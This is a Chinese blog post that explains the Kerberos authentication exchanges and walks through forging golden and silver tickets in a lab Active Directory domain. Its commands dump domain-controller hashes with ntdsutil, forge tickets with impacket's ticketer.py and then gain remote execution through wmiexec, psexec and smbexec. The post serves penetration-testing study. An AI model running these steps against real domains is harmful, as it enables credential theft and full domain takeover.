Kerberos协议:制作金票银票

最新推荐文章于 2024-07-04 16:04:39 发布
最新推荐文章于 2024-07-04 16:04:39 发布
阅读量759 收藏 2
点赞数 1
分类专栏: 内网渗透 文章标签: python 网络安全 网络协议 linux 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45644323/article/details/120101560
版权

1.基础详解

Kerberos协议是一个基于票据(Ticket)的系统,kerberos的两个基础认证模块AS_REQ & AS_REP,TGS_REQ & TGS_REP。以及微软扩展的两个认证模块S4U和PAC。,在Kerberos系统中至少有三个角色:认证服务器(AS),客户端(Client)和普通服务器(Server)。认证服务器对用户进行验证,并发行供用户用来 请求会话票据的TGT(票据授予票据)。票据授予服务(TGS):在发行给客户的TGT的基础上,为网络服务发行ST(会话票据)。
kerberos的简化认证认证过程如下图:
在这里插入图片描述

1.KRB_AS_REQ

用户 User 向 KDC 请求,请求授予 TGT( ticket-granting ticket 票证授予票证),该过程就是一个证明你是你的过程。TGT 是一条加密的信息,其中包含会话密钥和用户信息(ID,名称,组等)。而用户向 AS(也可理解为 KDC) 发送的信息为 username+用 user-hash 加密的时间戳。AS 将收到此用户名,并将验证它是否存在于其数据库中。如果存在,则使用hash解密时间戳,以此来确定用户身份并且获得会话时间。

2.KRB_AS_REP

KDC 返回的信息有:

返回客户端与 TGS 的会话密钥,用 User 的 hash 进行加密。
TGT,TGT 使用的是 KDC 上 krbtgt 的 hash 加密,只有 KDC 可以解密,TGT 中包括
用户名(User)。
有效期。
客户端与 TGS 的会话密钥。
PAC(特权属性证书,其中包含了大量的关于用户的具体信息,包括他的标识符(SID)和所在的组)。

此阶段攻击者可以伪造票据授予票据(TGT)就是制作黄金票据;

本地复现:

所用环境:
域控:server2016;192.168.102.53
域内用户:win10(与主机名一直致);
先本地 dump下来域控所有hash:
ntdsutil "activate instance ntds" ifm "create full C:\windows\temp\ntdsutil" quit quit
在这里插入图片描述2.制作金票:

python ticketer.py -nthash 567430dc0f49d9466eb628a7a26ea6f1 -domain-sid S-1-5-21-4288872163-1171123276-120135037 -domain sharlongwen.com administrator

在这里插入图片描述设置环境变量:

set KRB5CCNAME=C:\Users\w'x'l\Desktop\opt\examples\administrator.ccache

设置host解析 :

192.168.102.55  win10

进行认证:

python wmiexec.py -k -no-pass -dc-ip 192.168.102.53 -debug win10

在这里插入图片描述其他的smbexec,psexec,xmbclient文件都可以申请认证;

票务授予服务(TGS)

经过 AS 阶段后,已经完成了身份的验证,用户只要拿着 TGT 即可取申请固定服务的 ST(Client-to-server ticket),需要注意,有的文章中会把 ST 和 TGS 的概念混淆掉,TGS 是整个 kerberos 认证中的一个组成部分,并不是票据。

KRB_TGS_REQ User 要申请服务,例如 申请 SERV01上的 CIFS服务,他将向 TGS 发送信息以换取 ST 发送的信息有: \1. TGT。 \2. 要使用的服务以及关联的主机,即 CIFS/SERV01。 \3. Authenticator(身份验证器),包含他的用户名和当前时间戳,使用 AS 阶段获取的 客户端与 TGS 的会话密钥 加密。

KDC 收到 TGT 后解密拿到 会话密钥,用会话密钥解密 Authenticator ,再与 TGT 中的用户信息做对比,来确定用户身份。

KRB_TGS_REP 验证身份后,KDC 将返回信息,允许用户向服务提出请求。 返回的信息有:

客户端与服务端的会话密钥(用 AS 阶段的会话密钥加密 即 用客户端与 TGS 的会话密钥加密)
ST,用服务端的 hash 加密,ST 中包括

  • 请求的服务 (CIFS/SERV01)
  • 客户的用户名 (User)
  • PAC
  • 客户端与服务端的会话密钥

这个阶段可以伪造白银票据(ST):

python ticketer.py -nthash 域内机器用户hash  -domain-sid 域SID -domain 域名 -spn 服务名/机器用户名.域名 域内管理员的用户名

python ticketer.py -nthash 97e3d0c7e68a87674132bf333532cb36 -domain-sid S-1-5-21-4288872163-1171123276-120135037 -domain sharlongwen.com -spn CIFS/WIN7.sharlongwen.com administrator

设置环境变量:

set KRB5CCNAME=C:\Users\w'x'l\Desktop\opt\examples\administrator.ccache

python smbclient.py -k -no-pass win10 -debug

在这里插入图片描述

python wmiexec.py -k -no-pass win10 -debug

在这里插入图片描述python psexec.py -k -no-pass win7 -debug

在这里插入图片描述可以发现这种方式是上传了个文件

python smbexec.py -k -no-pass win10 -debug

在这里插入图片描述
这种方式是远程执行了一个bat文件.

总结

金票就是获得了TGT,需要向DC进行通信
银票获得了ST.不需要 向域控进行通信

陈年往事心中绕
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Kerberos的黄金票据详解
weixin_30642267的博客
12-27 1107
0x01黄金票据的原理和条件 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。如下图所示,与域控制器没有AS-REQ或AS-REP(步骤1和2)通信。由于黄金票据是伪造的TGT,它作为TGS-REQ的一部分被发送到域控制器以获得服务票据。 Kerberos金票据是有效的TGT Kerberos票据,因为它是由域Kerberos帐户(KRBTGT)加密和签名的。TGT仅用...
Kerberos协议理解
05-05
Kerberos协议理解 Kerberos是一种广泛使用的身份验证协议,旨在提供身份验证服务,以确保在不安全的网络环境中进行身份验证的安全性。下面将详细介绍Kerberos协议的概念、原理和工作流程。 1. Kerberos协议的基础...
复现k8s黄金票据学习
kaituozhizzz的博客
04-03 1663
这里说一下krbtgt帐户,该用户是在创建活动目录时系统自动创建的一个账号,其作用是KDC密钥发行中心的服务账号,其密码是系统随机生成的,无法正常登陆主机。同样,在TGS-REP阶段,TGS_REP里面的ST服务票据是使用服务的hash进行加密的,如果我们拥有服务的hash,就可以签发任意用户的ST服务票据,这个票据也被称为白银票据,这种攻击方式被称为。相较于黄金票据,白银票据使用要访问服务的hash,而不是krbtgt的hash。提供服务的服务端:域内提供服务的服务端,服务端都有一个独一的SPN。
解析:Kerberos、黄金票据和白银票
Sgirll的博客
07-15 777
是指攻击者获取了合法用户的TGT(Ticket Granting Ticket)的信息,然后对TGT进行篡改以生成伪造的服务票据(TGS票据)。白银票据伪装成合法的TGS票据,用于访问特定的服务,但与黄金票据不同,白银票据只能访问被篡改的服务,无法获得对整个域的完全控制。服务访问:用户使用TGS票据向目标服务发送请求,目标服务使用TGS的私有秘钥解密票据并验证用户的身份。服务票据的颁发:TGS验证TGT,并为用户生成一个服务票据(TGS票据),该票据包含有关用户和目标服务的信息,并用TGS的私有秘钥加密。
Kerberos认证介绍及黄金票据和白银票
qq_41814777的博客
05-08 1301
学前介绍 LM协议: 早期SMB协议在网络上传输明文口令。后来出现LAN Manager 挑战和 响应 验证机制简称LM,很简单,容易被破解 NTLM: 微软提出的一种windowsNT挑战/响应验证机制,称之为NTLM。现在已经 有了更新到了NTLMv2和kerberos验证机制 NTML的挑战和响应机制如下:(就跟短信验证码一样) 协商:客户端向服务端确认协议的版本 质询:客户端向服务端发送用户信息请求;服务器接收之后生成一个16位随机数,称之为Challenge;用NTML HASH加密16位随机数,
最浅显易懂kerberos认证和黄金白银票
04-22 813
一、kerberos认证 一、 1.客户端账号用自己的密码哈希加密(时间戳、客户端、服务端等信息)发送给AS (身份验证服务) AS 收到后进行查找,确认有该账号后生成随机密钥1 2.发送回客户端两个东西: 用客户端账号对应的密码哈希加密的(随机密钥1)和TGT(黄金票据):用特定账户哈希加密的(随机密钥1和时间戳等信息) 二、 客户端收到后用自己的密码哈希解密得到随机密钥1,然后用随机密钥1加密(时间戳等信息)–—信息1 与TGT一同发给TGS(票据授权服务) 三、 1.TGS收到后用特定账户哈希解密得到
转:用 Kerberos 为 J2ME 应用程序上锁,第 2 部分: 生成一个 Kerberos 票据请求
我的Blog
04-23 1108
Kerberos 为 J2ME 应用程序上锁,第 2 部分: 生成一个 Kerberos 票据请求内容:基于 J2ME 的 Kerveros 客户机中的类生成基本 ASN.1 数据类型利用用户密码生成密钥生成 TGT 请求结束语参考资料 关于作者对本文的评价相关内容:Simplify enterprise Java authentication with single sign-on订阅:de
内网安全:Kerberos域认证流程---黄金票据和白银票
god_Zeo的安全博客
05-12 3951
文章目录0x00 前提0x01 Kerberos域认证域认证大致流程:第一部分:生成TGT 和 session key第二步:获取要访问的 server ticket第三部 向客户端向服务器请求认证0x01 白银票据(Silver Tickets)伪造白银票据(Silver Tickets)0x02 黄金票据(Golden Ticket)伪造黄金票据0x03 黄金票据和白银票据比较0x04 参考 0x00 前提 算是学习之后总结记录,加深自己的理解,这里我是参考了倾旋师傅的讲解,感觉讲的比较好,加入自己的
一文搞懂黄金白银票
m0_75218183的博客
06-29 879
在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
Kerberos.NET:完全内置于托管代码中的Kerberos实现
02-05
Kerberos.NET 一个完全由托管代码构建的完整Kerberos库,没有(很多)操作系统依赖性。 .NET基础 该项目由支持。 它是什么? .NET内置的库,可让您处理Kerberos消息。 您可以运行客户端,托管自己的KDC或仅验证...
cerbero:Kerberos协议攻击者
05-24
塞贝罗 Kerberos协议攻击者。 在Active Directory渗透测试中执行与Kerberos协议相关的多项任务的工具。安装从板条箱: cargo install cerbero 来自回购: git clone ...
域渗透中的DPAPI和Kerberos协议.pdf
08-08
议题分享主要介绍了域渗透中数据保护API架构逻辑和Kerberos认证协议的通信流程,同时从攻击者的角度谈了DPAPI和Kerberos协议的利用,最后给出常见攻击思路的防御和缓解措施。 1.1 DPAPI架构 1.2 DPAPI加密机制 1.3 ...
kerberos协议简介.pdf
07-11
麻省理工在版权许可的情况下,制作了一个 Kerberos 的免费实现工具,这种情况类似于 BSD。在 2007 年,麻省理工组成了一个 Kerberos 协会,以此推动 Kerberos 的持续发展。 Kerberos 协议的工作原理是基于 Needham-...
内网渗透-(黄金票据和白银票据)详解(一)
duoba_an的博客
03-31 1335
Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
内网渗透:三、Kerberos协议及票据(黄金和白银)伪造
liu_jia_liang的博客
02-20 3477
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
windows环境通过客户端和jdbc连接kerberos认证Hive数据库集群解决方案
jianghao19930505的博客
08-02 2134
个人基于window环境通过dbeaver客户端和JDBC连接kerberos认证的Hive数据库集群经验
机器账户hash配合ptt拿shell(白银票据拿shell)
Shanfenglan's blog
07-15 333
文章目录命令 命令 需要目标服务的ntlmhash,域的sid,域名与你要伪造的用户的hash python ticketer.py -nthash 77bec211c5b72988b659dbbcf1052b2c -spn cifs/yukong -domain-sid S-1-5-21-3763276348-88739081-2848684050 -domain test.com administrator set KRB5CCNAME=administrator.ccache python wm
约束委派+利用约束委派生成黄金票
a3320315的博客
06-21 1635
环境 域: test.com 域控:Windows server 2012R2, 主机名: AD, IP: 192.168.1.7 域内主机:系统:windows 2012R2,主机名:HyyMbb,ip:192.168.1.22 被委派用户test 测试用户test1 操作步骤 我们需要提前知道的信息 被委派用户的明文密码或者ntml 密码:123!@#qwe ntml:e5ae562ddfaa6b446c32764ab1ebf3ed 1、已经知道服务用户明文的条件下,我们可以用kekeo请求该用户
Java基础:爬虫
最新发布
weixin_65752158的博客
07-04 885
Pattern:表示正则表达式Matcher:文本匹配器,作用按照正则表达式的规则去读取字符串,从头开始读取。在大串中去找符合匹配规则的子串。通过Pattern p = Pattern.compile("正则表达式");获得 通过Matcher m = p.matcher(str);获得 (m要在str中找符合p规则的小串)其中, m为Matcher对象, p为正则表达式规则, str为要验证的字符串. boolean b = m.find(); 表示拿着文本匹配器从头开始读取,寻找是否有
Kerberos配置文件
06-27
Kerberos是一种计算机网络认证协议,旨在通过安全手段对个人通信进行身份认证。该协议由麻省理工学院开发,采用客户端/服务器结构,并允许客户端和服务器端相互认证。Kerberos可应用于防止窃听、防止重放攻击和保护...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

陈年往事心中绕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值